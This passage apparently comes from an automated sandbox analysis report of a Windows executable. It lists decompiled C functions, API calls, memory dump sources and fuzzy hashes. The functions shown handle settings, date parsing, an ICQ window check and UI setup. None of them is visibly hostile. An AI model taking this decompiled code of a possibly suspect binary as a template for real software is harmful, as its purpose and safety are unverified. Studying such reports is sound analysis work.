    				_t72 = 0x1e;
    				 *((char*)(_t84 + 0x141)) = 1;
    				 *((intOrPtr*)(_t84 + 0x100)) = 0x19;
    				 *(_t84 + 0x104) =  *(_t84 + 0x104) & 0x00000000;
    				 *((intOrPtr*)(_t84 + 0x108)) = _t72;
    				_t80 = 2;
    				_t58 =  &_v8;
    				 *((char*)(_t84 + 0x110)) = 1;
    				 *_t84 = _t80;
    				_push(_t58);
    				 *((intOrPtr*)(_t84 + 0x114)) = 0x64c;
    				L0043E162();
    				_t59 =  *_t58;
    				_t75 = _t84 + 0x118;
    				 *_t75 = _t59;
    				 *((intOrPtr*)(_t84 + 0x11c)) = _t59;
    				 *((intOrPtr*)(_t84 + 0x120)) =  *_t75;
    				 *(_t84 + 0x688) =  *(_t84 + 0x688) & 0x00000000;
    				 *(_t84 + 0x13f) =  *(_t84 + 0x13f) & 0x00000000;
    				 *((char*)(_t84 + 0x12d)) = 1;
    				 *((intOrPtr*)(_t84 + 0x684)) = 5;
    				 *((intOrPtr*)(_t84 + 0x690)) = 0x5a;
    				 *((char*)(_t84 + 0x129)) = 1;
    				 *((char*)(_t84 + 0x12e)) = 1;
    				 *((char*)(_t84 + 0x139)) = 1;
    				 *((char*)(_t84 + 0x131)) = 1;
    				 *((char*)(_t84 + 0x133)) = 1;
    				 *((char*)(_t84 + 0x142)) = 1;
    				 *((intOrPtr*)(_t84 + 0x10c)) = 0x3e8;
    				 *((char*)(_t84 + 0x135)) = 1;
    				 *((char*)(_t84 + 0x140)) = 1;
    				 *((char*)(_t84 + 0x148)) = 1;
    				_t61 = E0040B985();
    				 *(_t84 + 0x66c) =  *(_t84 + 0x66c) & 0x00000000;
    				 *(_t84 + 0x754) =  *(_t84 + 0x754) & 0x00000000;
    				 *((char*)(_t84 + 0x126)) = _t61 & 0xffffff00 | _t61 != 0x00000000;
    				 *((intOrPtr*)(_t84 + 0x106c)) = 0x15;
    				 *((intOrPtr*)(_t84 + 0x670)) = _t72;
    				 *((char*)(_t84 + 0x361)) = 1;
    				 *((char*)(_t84 + 0x362)) = 1;
    				 *((char*)(_t84 + 0x363)) = 1;
    				 *((char*)(_t84 + 0x364)) = 1;
    				 *((intOrPtr*)(_t84 + 0x674)) = 0x3e8;
    				 *((intOrPtr*)(_t84 + 0x358)) = _t80;
    				 *((intOrPtr*)(_t84 + 0x35c)) = _t80;
    				 *((intOrPtr*)(_t84 + 0x678)) = 3;
    				 *((intOrPtr*)(_t84 + 0x68c)) = 1;
    				lstrcpyA(_t84 + 0x768,  *(E00429029( &_v8, 0xe03d)));
    				L0043DD36();
    				 *((char*)(_t84 + 0x1068)) = 1;
    				if(E00428AA6() != 0) {
    					 *((char*)(_t84 + 0x14d)) = 1;
    					lstrcpyA(_t84 + 0x150, "%APPDATA%\\BPK\\");
    				}
    				return _t84;
    			}

    APIs
    • memset.MSVCRT ref: 0040BA28
    • #3811.MFC42(?), ref: 0040BA8A
      • Part of subcall function 0040B985: __EH_prolog.LIBCMT ref: 0040B98A
      • Part of subcall function 0040B985: GetKeyboardLayoutList.USER32(00000014,?,00000002), ref: 0040B999
      • Part of subcall function 0040B985: GetKeyboardLayoutNameA.USER32 ref: 0040B9AD
      • Part of subcall function 0040B985: #537.MFC42(00000409), ref: 0040B9B7
      • Part of subcall function 0040B985: #5710.MFC42(?,00000004,00000409), ref: 0040B9C8
      • Part of subcall function 0040B985: strcmp.MSVCRT ref: 0040B9D4
      • Part of subcall function 0040B985: #800.MFC42(?,00000004,00000409), ref: 0040B9F0
      • Part of subcall function 0040B985: #800.MFC42(?,00000004,00000409), ref: 0040B9FC
      • Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
      • Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
      • Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A
    • lstrcpyA.KERNEL32(?,00000000), ref: 0040BBAC
    • #800.MFC42 ref: 0040BBB1
      • Part of subcall function 00428AA6: GetVersionExA.KERNEL32(?), ref: 00428AC0
    • lstrcpyA.KERNEL32(?,%APPDATA%\BPK\), ref: 0040BBD9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#537KeyboardLayoutlstrcpy$#1168#3811#5710H_prologListLoadNameStringVersionmemsetstrcmp
    • String ID: %APPDATA%\BPK\
    • API String ID: 2494417463-1467551811
    • Opcode ID: 2294109f747cae7c1b495328d78114a284539bb9e63ea87b08af0fac3d2435be
    • Instruction ID: 49241c115b9838168872868655aab705ec2d935350ae02bcf2efe0ba447b3199
    • Opcode Fuzzy Hash: 2294109f747cae7c1b495328d78114a284539bb9e63ea87b08af0fac3d2435be
    • Instruction Fuzzy Hash: 60410870508B849EE322CB39C4497C7BBE5AB6630CF04495DD4EE4A282D7FB3198CB65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 65%
    			E0042987E(char* _a4, intOrPtr* _a8) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				intOrPtr _v32;
    				char* _t23;
    				void* _t37;
    				intOrPtr* _t43;
    				char* _t45;
    				CHAR* _t46;
    
    				_t23 = strchr(_a4, 0x20);
    				if(_t23 == 0) {
    					L3:
    					return 0;
    				}
    				_t45 = strchr( &(_t23[1]), 0x20);
    				if(_t45 == 0) {
    					goto L3;
    				}
    				_t43 = _a8;
    				_t46 = _t45 + 1;
    				lstrcpynA(_t43 + 4, _t46, 0x7ff);
    				 *(_t46 - 1) =  *(_t46 - 1) & 0x00000000;
    				if(sscanf(_a4, "%d/%d/%d %d:%d:%d",  &_v28,  &_v24,  &_v8,  &_v20,  &_v16,  &_v12) == 6) {
    					_push(0xffffffff);
    					_v8 = _v8 + 0x7d0;
    					_push(_v12);
    					_push(_v16);
    					_push(_v20);
    					_push(_v24);
    					_push(_v28);
    					_push(_v8);
    					L0043E49E();
    					 *_t43 = _v32;
    					_t37 = 1;
    					return _t37;
    				}
    				goto L3;
    			}

    APIs
    • strchr.MSVCRT ref: 00429891
    • strchr.MSVCRT ref: 0042989D
    • lstrcpynA.KERNEL32(00000006,00000001,000007FF,?,?,0042A16F,?,?,?,?,00000001,00000000,0042A4E3), ref: 004298B5
    • sscanf.MSVCRT ref: 004298DF
    • #551.MFC42(000007D0,?,?,?,?,?,000000FF), ref: 0042990F
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: strchr$#551lstrcpynsscanf
    • String ID: %d/%d/%d %d:%d:%d
    • API String ID: 1469383783-1073349071
    • Opcode ID: 7c4c5cc3d185cd5d9044596d238cd3fa9dd5fba74d4af3212b5e25004957487a
    • Instruction ID: 629ab36ed323810976d1b48822148cef370bbc78154cb74c83e9d7926356c467
    • Opcode Fuzzy Hash: 7c4c5cc3d185cd5d9044596d238cd3fa9dd5fba74d4af3212b5e25004957487a
    • Instruction Fuzzy Hash: 3311677690021ABBDF11DBD4DC45EEFBBBCEF09320F140122F611E6191EA74AA15DBA4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 80%
    			E0040B58E(struct HWND__* _a4, char* _a8) {
    				void _v263;
    				char _v264;
    				void* _t15;
    				signed int _t27;
    				void* _t38;
    				void* _t39;
    				intOrPtr* _t40;
    
    				if(IsWindow(_a4) == 0 || strcmp(_a8, "__oxFrame.class__") != 0) {
    					L6:
    					return 0;
    				} else {
    					_t15 = E0040FF68(_a4, _t14, "__oxFrame.class__", _t14, "Internet Explorer_Server", _t14);
    					_t39 = _t38 + 0x18;
    					if(_t15 == 0) {
    						goto L6;
    					}
    					_v264 = _v264 & 0x00000000;
    					_t27 = 0x40;
    					memset( &_v263, 0, _t27 << 2);
    					_t40 = _t39 + 0xc;
    					asm("stosw");
    					asm("stosb");
    					if(E00428947(_a4,  &_v264) == 0) {
    						goto L6;
    					}
    					_strlwr( &_v264);
    					 *_t40 = "icq.exe";
    					if(strstr( &_v264, ??) == 0) {
    						goto L6;
    					}
    					return 1;
    				}
    			}

    APIs
    • IsWindow.USER32(?), ref: 0040B59B
    • strcmp.MSVCRT ref: 0040B5B2
      • Part of subcall function 0040FF68: FindWindowExA.USER32 ref: 0040FF7F
      • Part of subcall function 0040FF68: FindWindowExA.USER32 ref: 0040FF90
      • Part of subcall function 00428947: IsWindow.USER32(00000000), ref: 0042896B
    • _strlwr.MSVCRT ref: 0040B60A
    • strstr.MSVCRT ref: 0040B61E
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: Window$Find$_strlwrstrcmpstrstr
    • String ID: Internet Explorer_Server$__oxFrame.class__
    • API String ID: 2833045664-2130105940
    • Opcode ID: 2faa1993934307063d6a46b96878a0ecfa6bc5ac05adf161643f02ad758a56d2
    • Instruction ID: fc1f0624b3fcf2580b2171affe93380737160daf20bdf4a1bd0fabe86463b360
    • Opcode Fuzzy Hash: 2faa1993934307063d6a46b96878a0ecfa6bc5ac05adf161643f02ad758a56d2
    • Instruction Fuzzy Hash: 7E11E9B65041197AEF105B21DC06BEB7BACDB01351F10447BF904E10D0EF7ADA89C69D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 62%
    			E004206E8(void* __ecx) {
    				char* _t8;
    				char* _t9;
    				char* _t13;
    				char* _t27;
    				char* _t28;
    				void* _t30;
    
    				_t30 = __ecx;
    				_push(0);
    				_push( *((intOrPtr*)(__ecx + 0x360)));
    				L0043E462();
    				while(1) {
    					_t27 =  *(_t30 + 0x35c);
    					_t8 = strstr(_t27, "\n\n");
    					if(_t8 == 0) {
    						goto L3;
    					}
    					_push(1);
    					_push(_t8 - _t27);
    					L0043E468();
    				}
    				while(1) {
    					L3:
    					_t28 =  *(_t30 + 0x35c);
    					_t9 = strstr(_t28, "  ");
    					if(_t9 == 0) {
    						break;
    					}
    					_push(1);
    					_push(_t9 - _t28);
    					L0043E468();
    				}
    				_push(1);
    				_push( *((intOrPtr*)(_t30 + 0x360)) - 1);
    				L0043E468();
    				_t13 =  *((intOrPtr*)(_t30 + 0x360)) - 1;
    				if(_t13 >= 0) {
    					_t13 =  *(_t30 + 0x35c);
    					if( *_t13 == 0xa) {
    						_push(1);
    						_push(0);
    						L0043E468();
    						return _t13;
    					}
    				}
    				return _t13;
    			}

    APIs
    • #5857.MFC42(?,00000000,?,?,?,?,004201DB,?), ref: 004206FE
    • strstr.MSVCRT ref: 00420715
    • #5602.MFC42(00000000,00000001,?,?,004201DB,?), ref: 00420724
    • strstr.MSVCRT ref: 00420737
    • #5602.MFC42(00000000,00000001,004201DB,?), ref: 00420746
    • #5602.MFC42(?,00000001,004201DB,?), ref: 0042075F
    • #5602.MFC42(00000000,00000001,?,00000001,004201DB,?), ref: 0042077A
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #5602$strstr$#5857
    • String ID:
    • API String ID: 3537604326-0
    • Opcode ID: 23aaaef53e612fe712526a1b4c56410da43d85d995ff2dcccefd7662c45e512a
    • Instruction ID: deeabae32b8c25dc12173e7d4dd1425a429a38cb1d6d66e93349bb875bbcb849
    • Opcode Fuzzy Hash: 23aaaef53e612fe712526a1b4c56410da43d85d995ff2dcccefd7662c45e512a
    • Instruction Fuzzy Hash: C7114435341705AFEA20A6369C82FB773DEEBD9716F10142FF002971C2CA69BC044B18
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 45%
    			E0040EC8E(void* __ecx, void* __eflags) {
    				intOrPtr* _t18;
    				long _t20;
    				void* _t35;
    				void* _t37;
    
    				E0043E4E0(0x440220, _t37);
    				_push(__ecx);
    				_push(__ecx);
    				_t35 = __ecx;
    				 *(_t37 - 0x10) = SendMessageA( *(__ecx + 0x248), 0x1004, 0, 0);
    				_t18 = E00429029(_t37 - 0x14, 0xe00d);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push( *_t18);
    				_push( *(_t37 - 0x10));
    				 *(_t37 - 4) = 0;
    				_push(1);
    				L0043DF88();
    				 *(_t37 - 4) =  *(_t37 - 4) | 0xffffffff;
    				L0043DD36();
    				L0043DF9A();
    				_t20 = SendMessageA( *(_t35 + 0x248), 0x1017,  *(_t37 - 0x10), 0);
    				_push(_t20);
    				L0043DD9C();
    				 *[fs:0x0] =  *((intOrPtr*)(_t37 - 0xc));
    				return _t20;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0040EC93
    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040ECB4
      • Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
      • Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
      • Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A
    • #3998.MFC42(00000001,?,?,00000000,00000000,00000000,00000000), ref: 0040ECDE
    • #800.MFC42(00000001,?,?,00000000,00000000,00000000,00000000), ref: 0040ECEA
    • #5981.MFC42(00000001,?,?,00000000,00000000,00000000,00000000), ref: 0040ECF5
    • SendMessageA.USER32(?,00001017,?,00000000), ref: 0040ED09
    • #2864.MFC42(00000000), ref: 0040ED0C
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: MessageSend$#1168#2864#3998#537#5981#800H_prologLoadString
    • String ID:
    • API String ID: 1514844440-0
    • Opcode ID: 43cd8eb62e9f9f25e3149491fd485a222a6cd2dcb13c72d8be124b6338c3f50d
    • Instruction ID: 30f56704bdc665a8c60f1639930bc5770bfb9fdae95e9a63c0478b0e6c2e91de
    • Opcode Fuzzy Hash: 43cd8eb62e9f9f25e3149491fd485a222a6cd2dcb13c72d8be124b6338c3f50d
    • Instruction Fuzzy Hash: B90116B1900209BEE7149BA5EC86EFFB77CFB49358F10052EB115A21A1DAB45D408A64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 28%
    			E0041A8D6(intOrPtr __eax, void* __ecx) {
    				void* _t17;
    				long _t18;
    				void* _t27;
    
    				_push(1);
    				_push(0);
    				_t27 = __ecx;
    				_push(0x42e);
    				L0043E2DC();
    				_push(0x64);
    				 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x288)) + 0x100)) = __eax;
    				_push( *((intOrPtr*)(__ecx + 0x288)) + 4);
    				_push(0x42d);
    				L0043E078();
    				_push(0x32);
    				_push( *((intOrPtr*)(__ecx + 0x288)) + 0x68);
    				_push(0x42f);
    				L0043E078();
    				_push(0x32);
    				_push( *((intOrPtr*)(__ecx + 0x288)) + 0x9a);
    				_push(0x430);
    				L0043E078();
    				_push(0x32);
    				_t17 =  *((intOrPtr*)(__ecx + 0x288)) + 0xcc;
    				_push(_t17);
    				_push(0x432);
    				L0043E078();
    				_push(0x44a);
    				L0043E066();
    				_t18 = SendMessageA( *(_t17 + 0x20), 0x147, 0, 0);
    				 *( *(_t27 + 0x288)) = _t18;
    				return _t18;
    			}

    APIs
    • #3095.MFC42(0000042E,00000000,00000001), ref: 0041A8E2
    • #3098.MFC42(0000042D,?,00000064,0000042E,00000000,00000001), ref: 0041A906
    • #3098.MFC42(0000042F,?,00000032,0000042D,?,00000064,0000042E,00000000,00000001), ref: 0041A91E
    • #3098.MFC42(00000430,?,00000032,0000042F,?,00000032,0000042D,?,00000064,0000042E,00000000,00000001), ref: 0041A938
    • #3098.MFC42(00000432,?,00000032,00000430,?,00000032,0000042F,?,00000032,0000042D,?,00000064,0000042E,00000000,00000001), ref: 0041A952
    • #3092.MFC42(0000044A,00000432,?,00000032,00000430,?,00000032,0000042F,?,00000032,0000042D,?,00000064,0000042E,00000000,00000001), ref: 0041A95E
    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0041A96F
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #3098$#3092#3095MessageSend
    • String ID:
    • API String ID: 257495916-0
    • Opcode ID: b1c4c752cafa6c3239db450b5ae815dbe70a5b05f9cdd894e040348c7e26eaa7
    • Instruction ID: 23bf44550fae4f19a05b060bbf3ef36a8ddec6c02516f4313440ad4bc3351154
    • Opcode Fuzzy Hash: b1c4c752cafa6c3239db450b5ae815dbe70a5b05f9cdd894e040348c7e26eaa7
    • Instruction Fuzzy Hash: D501A7B5782320ABFA649B62CC57FEA3665DB48F44F80411DB3499F2E1CEE56800C768
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 35%
    			E0041C11B(void* __ecx) {
    				void* __esi;
    				void* _t8;
    				void* _t9;
    				long _t11;
    				void* _t13;
    				void* _t21;
    
    				_t21 = __ecx;
    				L0043DF94();
    				_push(1);
    				_push(0x808080);
    				_push(0x10101);
    				_push(0xefefef);
    				_push(__ecx);
    				_push(1);
    				_t9 = L00404F47(_t8, __ecx + 0x12c, __ecx);
    				_push(1);
    				_push(0x808080);
    				_push(0x10101);
    				_push(0xefefef);
    				_push(_t21);
    				_push(2);
    				L00404F47(_t9, _t21 + 0xd8, _t21);
    				_t11 = GetSysColor(0xf);
    				_push("Verdana");
    				 *(_t21 + 0xb0) = _t11;
    				 *((intOrPtr*)(_t21 + 0xa8)) = 0x2bc;
    				 *((intOrPtr*)(_t21 + 0xa4)) = 0xe;
    				L0043DDD2();
    				_push(0x42d);
    				L0043E066();
    				SendMessageA( *(_t11 + 0x20), 0xcc, 0x2a, 0);
    				_t13 = 1;
    				return _t13;
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #3092#4710#860ColorMessageSend
    • String ID: Verdana
    • API String ID: 3831384366-987297809
    • Opcode ID: 4c792ba07d881f36dee2735293464de8265ab96a199f39e5156c7443164c8bb3
    • Instruction ID: be0b6bc33a9ed9147f802c31bd2899f792ad526cbf5f0fa57aac85c9bccff80c
    • Opcode Fuzzy Hash: 4c792ba07d881f36dee2735293464de8265ab96a199f39e5156c7443164c8bb3
    • Instruction Fuzzy Hash: 4D0167713417047BE230A762DC46FA77A58DF86B55F00046EF39A6A1D1CBF52844C769
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 90%
    			E0042AF2E(intOrPtr* __ecx) {
    				void* __esi;
    				void* _t21;
    				void* _t22;
    				void* _t23;
    				intOrPtr* _t44;
    				void* _t46;
    
    				E0043E4E0(0x443281, _t46);
    				_push(__ecx);
    				_t44 = __ecx;
    				_push( *((intOrPtr*)(_t46 + 8)));
    				 *((intOrPtr*)(_t46 - 0x10)) = __ecx;
    				_t21 = E0040E7C0(__ecx, 0x74);
    				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
    				_t22 = L00404F04(_t21, __ecx + 0x70, __ecx);
    				 *(_t46 - 4) = 1;
    				_t23 = L00404F04(_t22, _t44 + 0xc4, _t44);
    				 *(_t46 - 4) = 2;
    				L00404F04(_t23, _t44 + 0x118, _t44);
    				 *(_t46 - 4) = 3;
    				L0043DF64();
    				 *((intOrPtr*)(_t44 + 0x16c)) = 0x445930;
    				 *(_t46 - 4) = 4;
    				L0043DF64();
    				 *((intOrPtr*)(_t44 + 0x1ac)) = 0x446000;
    				 *(_t46 - 4) = 5;
    				L0043DF64();
    				 *((intOrPtr*)(_t44 + 0x1ec)) = 0x445930;
    				 *(_t46 - 4) = 6;
    				L0043E3A2();
    				 *_t44 = 0x4497d0;
    				 *[fs:0x0] =  *((intOrPtr*)(_t46 - 0xc));
    				return _t44;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0042AF33
      • Part of subcall function 0040E7C0: #324.MFC42(?,00000000,?,?,00403EF4,000000C2,?), ref: 0040E7CB
    • #567.MFC42(?,00000000,?,00422424,00000000), ref: 0042AF81
    • #567.MFC42(?,00000000,?,00422424,00000000), ref: 0042AF99
    • #567.MFC42(?,00000000,?,00422424,00000000), ref: 0042AFB0
    • #384.MFC42(?,00000000,?,00422424,00000000), ref: 0042AFC1
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
